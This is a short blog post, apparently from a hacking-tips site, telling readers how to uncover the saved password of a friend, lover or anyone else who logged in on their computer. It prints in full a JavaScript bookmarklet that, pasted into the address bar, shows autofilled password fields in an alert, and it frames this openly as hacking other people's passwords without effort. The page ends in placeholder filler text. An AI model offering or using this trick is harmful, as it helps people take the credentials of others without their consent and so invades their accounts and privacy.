Open top menu
Friday, 10 January 2014

               If your friend/lover/anyone selects the remember passwords option when they login in your pc, then you got the chance to hack their password without much effort (no need of phishing).
If they select remember password in Mozilla popup. It is easy to see the password using this method,

How to see the remembered passwords?

 Whenever someone selects remember password in login form, the passwords will be automatically filled.  But the problem is that we can login but cannot see the password.  Because the password will be shown as "asterisk characters"(*).  Here is the trick to crack that also.
Visit any site which remembers passwords and show asterisk characters in password box.

Copy the following code


javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in formson this page.");})();


Paste in the address bar.

Press enter key
now the hidden password behind the asterisks character will be shown.


Tutorial with Example Picture: 

Let’s take the yahoomail.com
if the password is auto filled as shown in the picture, then this method will work for you.
Note : If it not works, then you have to install some old version of mozilla....
Feel Free to Comment....

Tagged
Different Themes
Written by Lovely

Aenean quis feugiat elit. Quisque ultricies sollicitudin ante ut venenatis. Nulla dapibus placerat faucibus. Aenean quis leo non neque ultrices scelerisque. Nullam nec vulputate velit. Etiam fermentum turpis at magna tristique interdum.

0 comments